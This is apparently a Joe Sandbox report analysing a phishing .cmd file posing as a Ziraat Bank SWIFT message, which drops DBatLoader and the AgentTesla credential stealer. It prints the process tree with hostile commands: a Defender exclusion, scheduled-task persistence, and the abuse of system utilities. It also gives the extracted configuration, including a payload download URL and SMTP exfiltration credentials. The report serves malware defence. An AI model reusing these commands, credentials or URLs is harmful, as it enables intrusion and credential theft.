Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
Analysis ID:	1555251
MD5:	20234d2431671991411222678e9620f5
SHA1:	88924a49c162ca22ac9ec365a8743cd1647f4501
SHA256:	4003e71429b746c43d34c5ef4e793675dad9d60c7cb63d9e0f8c4d70843faadc
Tags:	cmduser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected DBatLoader

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executable to a common third party application directory

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Infects executable files (exe, dll, sys, html)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 3136 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 3128 cmdline: extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)

x.exe (PID: 348 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 86EE0E8789E9C11F707D056C4052292E)

cmd.exe (PID: 6768 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 6392 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 1240 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)

conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lxsyrsiW.pif (PID: 1120 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 2820 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 5792 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5312 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 616 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 1568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 528 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

TrojanAIbot.exe (PID: 2164 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 7440 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 86EE0E8789E9C11F707D056C4052292E)

lxsyrsiW.pif (PID: 7484 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 7536 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 7580 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 7708 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 86EE0E8789E9C11F707D056C4052292E)

lxsyrsiW.pif (PID: 7756 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

TrojanAIbot.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 6564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 6564	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 7536	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 7536	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.0.neworigin.exe.540000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.0.neworigin.exe.540000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.0.neworigin.exe.540000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.x.exe.2b10000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 348, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 348, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 1120, ProcessName: lxsyrsiW.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5792, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 348, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 1120, ProcessName: lxsyrsiW.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 2820, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5312, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 6564, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5792, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T16:28:20.241005+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.5	49709	TCP
2024-11-13T16:28:59.061846+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.5	49908	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T16:28:02.656064+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	198.252.105.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721

Found malware configuration

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 11.0.neworigin.exe.540000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49791 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 0000000A.00000003.2177333908.0000000025FE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
